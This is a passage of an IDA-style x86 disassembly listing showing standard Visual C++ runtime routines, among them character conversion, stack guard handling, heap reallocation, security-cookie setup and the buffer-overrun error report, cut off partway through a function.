sub_414C80 proc near ; CODE XREF: sub_40FA2B+64�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_4C5DA0
jb short loc_414C8F
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_414C8F: ; CODE XREF: sub_414C80+A�j
mov ecx, eax
sar ecx, 5
mov ecx, dword_4C5DC0[ecx*4]
and eax, 1Fh
movsx eax, byte ptr [ecx+eax*8+4]
and eax, 40h
retn
sub_414C80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414CA7 proc near ; CODE XREF: sub_40FBCF+317�p
; sub_40FBCF+6F7�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_414CB8
xor eax, eax
jmp short loc_414D0A
; ---------------------------------------------------------------------------
loc_414CB8: ; CODE XREF: sub_414CA7+B�j
cmp dword_4C5998, esi
jnz short loc_414CD2
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_414CFD
mov [eax], cl
xor eax, eax
inc eax
jmp short loc_414D0A
; ---------------------------------------------------------------------------
loc_414CD2: ; CODE XREF: sub_414CA7+17�j
lea ecx, [ebp+arg_0]
push ecx
push esi
push dword_4214F4
mov [ebp+arg_0], esi
push eax
push 1
lea eax, [ebp+arg_4]
push eax
push esi
push dword_4C59A8
call dword_419058 ; WideCharToMultiByte
cmp eax, esi
jz short loc_414CFD
cmp [ebp+arg_0], esi
jz short loc_414D0A
loc_414CFD: ; CODE XREF: sub_414CA7+22�j
; sub_414CA7+4F�j
mov dword_4C5904, 2Ah
or eax, 0FFFFFFFFh
loc_414D0A: ; CODE XREF: sub_414CA7+F�j
; sub_414CA7+29�j ...
pop esi
pop ebp
retn
sub_414CA7 endp
; =============== S U B R O U T I N E =======================================
sub_414D0D proc near ; CODE XREF: sub_410863+2B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_4C5DA0
jnb short loc_414D56
mov ecx, eax
sar ecx, 5
mov ecx, dword_4C5DC0[ecx*4]
mov edx, eax
and edx, 1Fh
test byte ptr [ecx+edx*8+4], 1
jz short loc_414D56
push eax
call sub_415FAA
pop ecx
push eax
call dword_419038 ; FlushFileBuffers
test eax, eax
jnz short loc_414D4B
call dword_4190AC ; RtlGetLastWin32Error
jmp short loc_414D4D
; ---------------------------------------------------------------------------
loc_414D4B: ; CODE XREF: sub_414D0D+34�j
xor eax, eax
loc_414D4D: ; CODE XREF: sub_414D0D+3C�j
test eax, eax
jz short locret_414D63
mov dword_4C5908, eax
loc_414D56: ; CODE XREF: sub_414D0D+A�j
; sub_414D0D+22�j
mov dword_4C5904, 9
or eax, 0FFFFFFFFh
locret_414D63: ; CODE XREF: sub_414D0D+42�j
retn
sub_414D0D endp
; =============== S U B R O U T I N E =======================================
sub_414D64 proc near ; CODE XREF: sub_41095C+8A�p
; sub_41095C+464�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_414DB0
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_414D82
test al, al
jns short loc_414DB0
test al, 2
jnz short loc_414DB0
loc_414D82: ; CODE XREF: sub_414D64+14�j
cmp dword ptr [esi+8], 0
jnz short loc_414D8F
push esi
call sub_4106EF
pop ecx
loc_414D8F: ; CODE XREF: sub_414D64+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_414D9F
cmp dword ptr [esi+4], 0
jnz short loc_414DB0
inc eax
mov [esi], eax
loc_414D9F: ; CODE XREF: sub_414D64+30�j
dec dword ptr [esi]
test byte ptr [esi+0Ch], 40h
mov eax, [esi]
jz short loc_414DB6
cmp [eax], bl
jz short loc_414DB8
inc eax
mov [esi], eax
loc_414DB0: ; CODE XREF: sub_414D64+9�j
; sub_414D64+18�j ...
or eax, 0FFFFFFFFh
loc_414DB3: ; CODE XREF: sub_414D64+6A�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_414DB6: ; CODE XREF: sub_414D64+43�j
mov [eax], bl
loc_414DB8: ; CODE XREF: sub_414D64+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and eax, 0FFFFFFEFh
or eax, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_414DB3
sub_414D64 endp
; =============== S U B R O U T I N E =======================================
sub_414DD0 proc near ; CODE XREF: sub_41095C+77�p
; sub_41095C+9B�p ...
arg_0 = dword ptr 4
cmp dword_4214F4, 1
jle short loc_414DE7
push 8
push [esp+4+arg_0]
call sub_41328D
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_414DE7: ; CODE XREF: sub_414DD0+7�j
mov eax, [esp+arg_0]
mov ecx, off_4214EC
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
retn
sub_414DD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414DF9 proc near ; CODE XREF: sub_41095C+714�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_414E1C
cmp [ebp+arg_8], ebx
jz short loc_414E1C
mov al, [esi]
cmp al, bl
jnz short loc_414E22
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_414E1C
mov [eax], bx
loc_414E1C: ; CODE XREF: sub_414DF9+C�j
; sub_414DF9+11�j ...
xor eax, eax
loc_414E1E: ; CODE XREF: sub_414DF9+42�j
; sub_414DF9+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_414E22: ; CODE XREF: sub_414DF9+17�j
cmp dword_4C5998, ebx
jnz short loc_414E3D
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_414E38
movzx ax, al
mov [ecx], ax
loc_414E38: ; CODE XREF: sub_414DF9+36�j
; sub_414DF9+C0�j
xor eax, eax
inc eax
jmp short loc_414E1E
; ---------------------------------------------------------------------------
loc_414E3D: ; CODE XREF: sub_414DF9+2F�j
mov ecx, off_4214EC
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_414E9A
mov eax, dword_4214F4
cmp eax, 1
jle short loc_414E81
cmp [ebp+arg_8], eax
jl short loc_414E84
xor ecx, ecx
cmp [ebp+arg_0], ebx
setnz cl
push ecx
push [ebp+arg_0]
push eax
push esi
push 9
push dword_4C59A8
call dword_41913C ; MultiByteToWideChar
test eax, eax
mov eax, dword_4214F4
jnz short loc_414E1E
loc_414E81: ; CODE XREF: sub_414DF9+5C�j
cmp [ebp+arg_8], eax
loc_414E84: ; CODE XREF: sub_414DF9+61�j
jb short loc_414E8B
cmp [esi+1], bl
jnz short loc_414E1E
loc_414E8B: ; CODE XREF: sub_414DF9:loc_414E84�j
; sub_414DF9+C6�j
mov dword_4C5904, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_414E1E
; ---------------------------------------------------------------------------
loc_414E9A: ; CODE XREF: sub_414DF9+52�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
push 1
push esi
push 9
push dword_4C59A8
call dword_41913C ; MultiByteToWideChar
test eax, eax
jnz loc_414E38
jmp short loc_414E8B
sub_414DF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414EC1 proc near ; CODE XREF: sub_41095C+561�p
; sub_412ED1+FD�p ...
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
push 4
pop eax
call sub_40D9A0
mov ebx, esp
push 1Ch
lea eax, [ebp+var_24]
push eax
push ebx
call dword_41902C ; VirtualQuery
test eax, eax
jz short loc_414F56
mov edi, [ebp+var_20]
lea eax, [ebp+var_48]
push eax
call dword_419030 ; GetSystemInfo
mov eax, [ebp+var_44]
lea esi, [eax-1]
not esi
and esi, ebx
sub esi, eax
mov [ebp+var_4], eax
mov eax, dword_4C5910
mov ecx, eax
dec ecx
neg ecx
sbb ecx, ecx
and ecx, 0FFFF1000h
add ecx, 11000h
add ecx, edi
cmp esi, ecx
jb short loc_414F56
cmp eax, 1
jz short loc_414F6E
mov ebx, edi
mov edi, 1000h
loc_414F2B: ; CODE XREF: sub_414EC1+81�j
push 1Ch
lea eax, [ebp+var_24]
push eax
push ebx
call dword_41902C ; VirtualQuery
test eax, eax
jz short loc_414F56
add ebx, [ebp+var_18]
test [ebp+var_14], edi
jz short loc_414F2B
test [ebp+var_F], 1
mov ebx, [ebp+var_24]
jz short loc_414F52
xor eax, eax
inc eax
jmp short loc_414F8A
; ---------------------------------------------------------------------------
loc_414F52: ; CODE XREF: sub_414EC1+8A�j
cmp esi, ebx
jnb short loc_414F5A
loc_414F56: ; CODE XREF: sub_414EC1+22�j
; sub_414EC1+5C�j ...
xor eax, eax
jmp short loc_414F8A
; ---------------------------------------------------------------------------
loc_414F5A: ; CODE XREF: sub_414EC1+93�j
push 4
push edi
push [ebp+var_4]
push ebx
call dword_419174 ; VirtualAlloc
mov eax, dword_4C5910
jmp short loc_414F70
; ---------------------------------------------------------------------------
loc_414F6E: ; CODE XREF: sub_414EC1+61�j
mov ebx, esi
loc_414F70: ; CODE XREF: sub_414EC1+AB�j
dec eax
neg eax
sbb eax, eax
and eax, 103h
lea ecx, [ebp+var_8]
push ecx
inc eax
push eax
push [ebp+var_4]
push ebx
call dword_419034 ; VirtualProtect
loc_414F8A: ; CODE XREF: sub_414EC1+8F�j
; sub_414EC1+97�j
lea esp, [ebp-54h]
pop edi
pop esi
pop ebx
leave
retn
sub_414EC1 endp
; =============== S U B R O U T I N E =======================================
sub_414F92 proc near ; CODE XREF: sub_4114F6+34�p
; sub_4114F6+49�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
test ebx, ebx
push ebp
push edi
jnz short loc_414FAC
push [esp+0Ch+arg_4]
call sub_40E74F
pop ecx
jmp loc_4150F0
; ---------------------------------------------------------------------------
loc_414FAC: ; CODE XREF: sub_414F92+9�j
push esi
mov esi, [esp+10h+arg_4]
test esi, esi
jnz short loc_414FC1
push ebx
call sub_40E359
pop ecx
jmp loc_4150ED
; ---------------------------------------------------------------------------
loc_414FC1: ; CODE XREF: sub_414F92+21�j
cmp dword_4C5B68, 3
jnz loc_4150B9
loc_414FCE: ; CODE XREF: sub_414F92+11B�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41509B
push ebx
call sub_4120C4
mov ebp, eax
test ebp, ebp
pop ecx
jz loc_41507A
cmp esi, dword_4C5B54
ja short loc_41503A
push esi
push ebx
push ebp
call sub_4125C4
add esp, 0Ch
test eax, eax
jz short loc_415005
mov edi, ebx
jmp short loc_415036
; ---------------------------------------------------------------------------
loc_415005: ; CODE XREF: sub_414F92+6D�j
push esi
call sub_4128A3
mov edi, eax
test edi, edi
pop ecx
jz short loc_41503A
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_41501C
mov eax, esi
loc_41501C: ; CODE XREF: sub_414F92+86�j
push eax
push ebx
push edi
call sub_40E3A0
push ebx
call sub_4120C4
mov ebp, eax
push ebx
push ebp
call sub_4120EF
add esp, 18h
loc_415036: ; CODE XREF: sub_414F92+71�j
test edi, edi
jnz short loc_415076
loc_41503A: ; CODE XREF: sub_414F92+5E�j
; sub_414F92+7E�j
test esi, esi
jnz short loc_41503F
inc esi
loc_41503F: ; CODE XREF: sub_414F92+AA�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_4C5B64
call dword_4191B8 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_415076
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_415064
mov eax, esi
loc_415064: ; CODE XREF: sub_414F92+CE�j
push eax
push ebx
push edi
call sub_40E3A0
push ebx
push ebp
call sub_4120EF
add esp, 14h
loc_415076: ; CODE XREF: sub_414F92+A6�j
; sub_414F92+C6�j
test ebp, ebp
jnz short loc_415097
loc_41507A: ; CODE XREF: sub_414F92+52�j
test esi, esi
jnz short loc_41507F
inc esi
loc_41507F: ; CODE XREF: sub_414F92+EA�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push ebx
push 0
push dword_4C5B64
call dword_419170 ; RtlReAllocateHeap
mov edi, eax
loc_415097: ; CODE XREF: sub_414F92+E6�j
test edi, edi
jnz short loc_4150B5
loc_41509B: ; CODE XREF: sub_414F92+41�j
cmp dword_4C5988, 0
jz short loc_4150B5
push esi
call sub_412B9F
test eax, eax
pop ecx
jnz loc_414FCE
jmp short loc_4150ED
; ---------------------------------------------------------------------------
loc_4150B5: ; CODE XREF: sub_414F92+107�j
; sub_414F92+110�j
mov eax, edi
jmp short loc_4150EF
; ---------------------------------------------------------------------------
loc_4150B9: ; CODE XREF: sub_414F92+36�j
; sub_414F92+159�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_4150D9
test esi, esi
jnz short loc_4150C5
inc esi
loc_4150C5: ; CODE XREF: sub_414F92+130�j
push esi
push ebx
push 0
push dword_4C5B64
call dword_419170 ; RtlReAllocateHeap
test eax, eax
jnz short loc_4150EF
loc_4150D9: ; CODE XREF: sub_414F92+12C�j
cmp dword_4C5988, 0
jz short loc_4150EF
push esi
call sub_412B9F
test eax, eax
pop ecx
jnz short loc_4150B9
loc_4150ED: ; CODE XREF: sub_414F92+2A�j
; sub_414F92+121�j
xor eax, eax
loc_4150EF: ; CODE XREF: sub_414F92+125�j
; sub_414F92+145�j ...
pop esi
loc_4150F0: ; CODE XREF: sub_414F92+15�j
pop edi
pop ebp
pop ebx
retn
sub_414F92 endp
; =============== S U B R O U T I N E =======================================
sub_4150F4 proc near ; CODE XREF: sub_4114F6+7�p
arg_0 = dword ptr 4
cmp dword_4C5B68, 3
push esi
jnz short loc_415118
mov esi, [esp+4+arg_0]
push esi
call sub_4120C4
test eax, eax
pop ecx
jz short loc_415115
mov eax, [esi-4]
sub eax, 9
pop esi
retn
; ---------------------------------------------------------------------------
loc_415115: ; CODE XREF: sub_4150F4+17�j
push esi
jmp short loc_41511C
; ---------------------------------------------------------------------------
loc_415118: ; CODE XREF: sub_4150F4+8�j
push [esp+4+arg_0]
loc_41511C: ; CODE XREF: sub_4150F4+22�j
push 0
push dword_4C5B64
call dword_419028 ; RtlSizeHeap
pop esi
retn
sub_4150F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41512C proc near ; CODE XREF: sub_411692+A4�p
; sub_411AAF+4F�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push 1Ch
push offset stru_41C5A8
call __SEH_prolog
xor esi, esi
cmp dword_4C5ADC, esi
jnz short loc_415177
lea eax, [ebp+var_1C]
push eax
xor edi, edi
inc edi
push edi
push offset dword_41BCD0
push edi
call dword_419020 ; GetStringTypeW
test eax, eax
jz short loc_415162
mov dword_4C5ADC, edi
jmp short loc_415177
; ---------------------------------------------------------------------------
loc_415162: ; CODE XREF: sub_41512C+2C�j
call dword_4190AC ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_415177
mov dword_4C5ADC, 2
loc_415177: ; CODE XREF: sub_41512C+14�j
; sub_41512C+34�j ...
mov eax, dword_4C5ADC
cmp eax, 2
jz loc_41526F
cmp eax, esi
jz loc_41526F
cmp eax, 1
jnz loc_415295
mov [ebp+var_20], esi
mov [ebp+var_24], esi
cmp [ebp+arg_10], esi
jnz short loc_4151A9
mov eax, dword_4C59A8
mov [ebp+arg_10], eax
loc_4151A9: ; CODE XREF: sub_41512C+73�j
push esi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
xor eax, eax
cmp [ebp+arg_18], esi
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call dword_41913C ; MultiByteToWideChar
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jz loc_415295
and [ebp+ms_exc.disabled], 0
lea ebx, [edi+edi]
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_40D9A0
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
mov [ebp+var_2C], esi
push ebx
push 0
push esi
call sub_40D7B0
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41521A
; ---------------------------------------------------------------------------
loc_415205: ; DATA XREF: .text:stru_41C5A8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_415209: ; DATA XREF: .text:stru_41C5A8�o
mov esp, [ebp+ms_exc.old_esp]
call sub_414EC1
xor esi, esi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_28]
loc_41521A: ; CODE XREF: sub_41512C+D7�j
test esi, esi
jnz short loc_415235
push edi
push 2
call sub_410733
pop ecx
pop ecx
mov esi, eax
test esi, esi
jz short loc_415295
mov [ebp+var_24], 1
loc_415235: ; CODE XREF: sub_41512C+F0�j
push edi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_41913C ; MultiByteToWideChar
test eax, eax
jz short loc_41525D
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_419020 ; GetStringTypeW
mov [ebp+var_20], eax
loc_41525D: ; CODE XREF: sub_41512C+11E�j
cmp [ebp+var_24], 0
jz short loc_41526A
push esi
call sub_40E359
pop ecx
loc_41526A: ; CODE XREF: sub_41512C+135�j
mov eax, [ebp+var_20]
jmp short loc_4152DD
; ---------------------------------------------------------------------------
loc_41526F: ; CODE XREF: sub_41512C+53�j
; sub_41512C+5B�j
mov ebx, [ebp+arg_14]
cmp ebx, esi
jnz short loc_41527C
mov ebx, dword_4C5998
loc_41527C: ; CODE XREF: sub_41512C+148�j
mov edi, [ebp+arg_10]
test edi, edi
jnz short loc_415289
mov edi, dword_4C59A8
loc_415289: ; CODE XREF: sub_41512C+155�j
push ebx
call sub_415FE6
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_415299
loc_415295: ; CODE XREF: sub_41512C+64�j
; sub_41512C+A5�j ...
xor eax, eax
jmp short loc_4152DD
; ---------------------------------------------------------------------------
loc_415299: ; CODE XREF: sub_41512C+167�j
cmp eax, edi
jz short loc_4152BB
push 0
push 0
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push edi
call sub_41602F
add esp, 18h
mov esi, eax
test esi, esi
jz short loc_415295
mov [ebp+arg_4], esi
loc_4152BB: ; CODE XREF: sub_41512C+16F�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call dword_419024 ; GetStringTypeA
mov edi, eax
test esi, esi
jz short loc_4152DB
push esi
call sub_40E359
pop ecx
loc_4152DB: ; CODE XREF: sub_41512C+1A6�j
mov eax, edi
loc_4152DD: ; CODE XREF: sub_41512C+141�j
; sub_41512C+16B�j
lea esp, [ebp-38h]
call __SEH_epilog
retn
sub_41512C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4152E6 proc near ; DATA XREF: .text:0041E004�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+var_8]
push eax
call dword_419180 ; GetSystemTimeAsFileTime
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call dword_4190BC ; GetCurrentProcessId
xor esi, eax
call dword_41917C ; GetCurrentThreadId
xor esi, eax
call dword_4190A8 ; GetTickCount
xor esi, eax
lea eax, [ebp+var_10]
push eax
call dword_4190D0 ; QueryPerformanceCounter
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
mov dword_421360, esi
jnz short loc_415339
mov dword_421360, 0BB40E64Eh
loc_415339: ; CODE XREF: sub_4152E6+47�j
pop esi
leave
retn
sub_4152E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41533C proc near ; CODE XREF: sub_411BA5-1D�p
var_128 = byte ptr -128h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 118h
push offset stru_41C758
call __SEH_prolog
mov eax, dword_421360
xor eax, [ebp+4]
mov [ebp+var_1C], eax
mov eax, dword_4C5AE0
xor ecx, ecx
cmp eax, ecx
jz short loc_415380
mov [ebp+ms_exc.disabled], ecx
push [ebp+arg_4]
push [ebp+arg_0]
call eax
pop ecx
pop ecx
loc_41536E: ; CODE XREF: sub_41533C+42�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp loc_41547E
; ---------------------------------------------------------------------------
loc_415377: ; DATA XREF: .text:stru_41C758�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41537B: ; DATA XREF: .text:stru_41C758�o
mov esp, [ebp+ms_exc.old_esp]
jmp short loc_41536E
; ---------------------------------------------------------------------------
loc_415380: ; CODE XREF: sub_41533C+23�j
mov eax, [ebp+arg_0]
dec eax
jz short loc_415399
mov edi, offset aUnknownSecurit ; "Unknown security failure detected!"
mov [ebp+var_20], offset aASecurityError ; "A security error of unknown cause has b"...
mov esi, 0D4h
jmp short loc_4153AA
; ---------------------------------------------------------------------------
loc_415399: ; CODE XREF: sub_41533C+48�j
mov edi, offset aBufferOverrunD ; "Buffer overrun detected!"
mov [ebp+var_20], offset aABufferOverrun ; "A buffer overrun has been detected whic"...
mov esi, 0B9h
loc_4153AA: ; CODE XREF: sub_41533C+5B�j
mov [ebp+var_24], cl
push 104h
lea eax, [ebp+var_128]
push eax
push ecx
call dword_419090 ; GetModuleFileNameA
test eax, eax
jnz short loc_4153D7
push offset aProgramNameUnk ; "<program name unknown>"
lea eax, [ebp+var_128]
push eax
call sub_40D8A0
pop ecx
pop ecx
loc_4153D7: ; CODE XREF: sub_41533C+86�j
lea ebx, [ebp+var_128]
lea eax, [ebp+var_128]
push eax
call sub_40D630
pop ecx
add eax, 0Bh
cmp eax, 3Ch
jbe short loc_41541B
lea eax, [ebp+var_128]
push eax
call sub_40D630
mov ebx, eax
lea eax, [ebp+var_128]
sub eax, 31h
add ebx, eax
push 3
push offset a___ ; "..."
push ebx
call sub_40DB80
add esp, 10h
loc_41541B: ; CODE XREF: sub_41533C+B4�j
push ebx
call sub_40D630
pop ecx
lea eax, [eax+esi+0Ch]
add eax, 3
and eax, 0FFFFFFFCh
call sub_40D9A0
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
push edi
push esi
call sub_40D8A0
mov edi, offset asc_41C568 ; "\n\n"
push edi
push esi
call sub_40D8B0
push offset dword_41C5B4
push esi
call sub_40D8B0
push ebx
push esi
call sub_40D8B0
push edi
push esi
call sub_40D8B0
push [ebp+var_20]
push esi
call sub_40D8B0
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push esi
call sub_416BBC
add esp, 3Ch
loc_41547E: ; CODE XREF: sub_41533C+36�j
push 3
call sub_40DE75
int 3 ; Trap to Debugger
sub_41533C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415486 proc near ; CODE XREF: sub_415505+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push 20h
pop ecx
cdq
idiv ecx
push 1Fh
pop ecx
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
mov ecx, [esp+arg_0]
not edx
test [ecx+eax*4], edx
jz short loc_4154AE
loc_4154A5: ; CODE XREF: sub_415486+26�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4154A8: ; CODE XREF: sub_415486+2C�j
cmp dword ptr [ecx+eax*4], 0
jnz short loc_4154A5
loc_4154AE: ; CODE XREF: sub_415486+1D�j
inc eax
cmp eax, 3
jl short loc_4154A8
xor eax, eax
inc eax
retn
sub_415486 endp
; =============== S U B R O U T I N E =======================================
sub_4154B8 proc near ; CODE XREF: sub_415505+42�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push edi
push 20h
pop ecx
cdq
idiv ecx
mov edi, [esp+8+arg_0]
mov esi, eax
lea eax, [edi+esi*4]
push eax
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
push edx
push dword ptr [eax]
call sub_416DD8
add esp, 0Ch
dec esi
js short loc_415502
lea edi, [edi+esi*4]
loc_4154E9: ; CODE XREF: sub_4154B8+48�j
test eax, eax
jz short loc_415502
push edi
push 1
push dword ptr [edi]
call sub_416DD8
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_4154E9
loc_415502: ; CODE XREF: sub_4154B8+2C�j
; sub_4154B8+33�j
pop edi
pop esi
retn
sub_4154B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415505 proc near ; CODE XREF: sub_415626+79�p
; sub_415626+C2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
dec edi
push 20h
lea eax, [edi+1]
pop ecx
cdq
idiv ecx
push 1Fh
pop esi
sub esi, edx
xor edx, edx
inc edx
mov ecx, esi
shl edx, cl
mov ebx, eax
mov eax, [ebp+arg_0]
test [eax+ebx*4], edx
jz short loc_415554
lea ecx, [edi+1]
push ecx
push eax
call sub_415486
test eax, eax
pop ecx
pop ecx
jnz short loc_415551
push edi
push [ebp+arg_0]
call sub_4154B8
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_415551: ; CODE XREF: sub_415505+3C�j
mov eax, [ebp+arg_0]
loc_415554: ; CODE XREF: sub_415505+2C�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax+ebx*4], edx
inc ebx
cmp ebx, ecx
jge short loc_41556F
lea edi, [eax+ebx*4]
sub ecx, ebx
xor eax, eax
rep stosd
loc_41556F: ; CODE XREF: sub_415505+5F�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_415505 endp
; =============== S U B R O U T I N E =======================================
sub_415577 proc near ; CODE XREF: sub_415626+6D�p
; sub_415626+AC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push 3
pop edx
sub ecx, eax
push esi
loc_415585: ; CODE XREF: sub_415577+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_415585
pop esi
retn
sub_415577 endp
; =============== S U B R O U T I N E =======================================
sub_415592 proc near ; CODE XREF: sub_415626+4D�p
arg_0 = dword ptr 4
xor eax, eax
loc_415594: ; CODE XREF: sub_415592+10�j
mov ecx, [esp+arg_0]
cmp dword ptr [ecx+eax*4], 0
jnz short loc_4155A8
inc eax
cmp eax, 3
jl short loc_415594
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4155A8: ; CODE XREF: sub_415592+A�j
xor eax, eax
retn
sub_415592 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4155AB proc near ; CODE XREF: sub_415626+B6�p
; sub_415626+D0�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
pop esi
cdq
mov ecx, esi
idiv ecx
mov ebx, [ebp+arg_0]
or edi, 0FFFFFFFFh
mov [ebp+arg_4], esi
mov ecx, edx
shl edi, cl
mov [ebp+var_8], eax
xor eax, eax
sub [ebp+arg_4], edx
not edi
mov [ebp+var_4], eax
loc_4155D9: ; CODE XREF: sub_4155AB+51�j
mov esi, [ebx+eax*4]
mov ecx, esi
and ecx, edi
mov [ebp+var_C], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+arg_4]
or esi, [ebp+var_4]
mov [ebx+eax*4], esi
mov esi, [ebp+var_C]
shl esi, cl
inc eax
cmp eax, 3
mov [ebp+var_4], esi
jl short loc_4155D9
push 2
pop eax
mov ecx, eax
sub ecx, [ebp+var_8]
lea ecx, [ebx+ecx*4]
loc_415609: ; CODE XREF: sub_4155AB+74�j
cmp eax, [ebp+var_8]
jl short loc_415615
mov edx, [ecx]
mov [ebx+eax*4], edx
jmp short loc_415619
; ---------------------------------------------------------------------------
loc_415615: ; CODE XREF: sub_4155AB+61�j
and dword ptr [ebx+eax*4], 0
loc_415619: ; CODE XREF: sub_4155AB+68�j
dec eax
sub ecx, 4
test eax, eax
jge short loc_415609
pop edi
pop esi
pop ebx
leave
retn
sub_4155AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415626 proc near ; CODE XREF: sub_41577E+D�p
; sub_415794+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
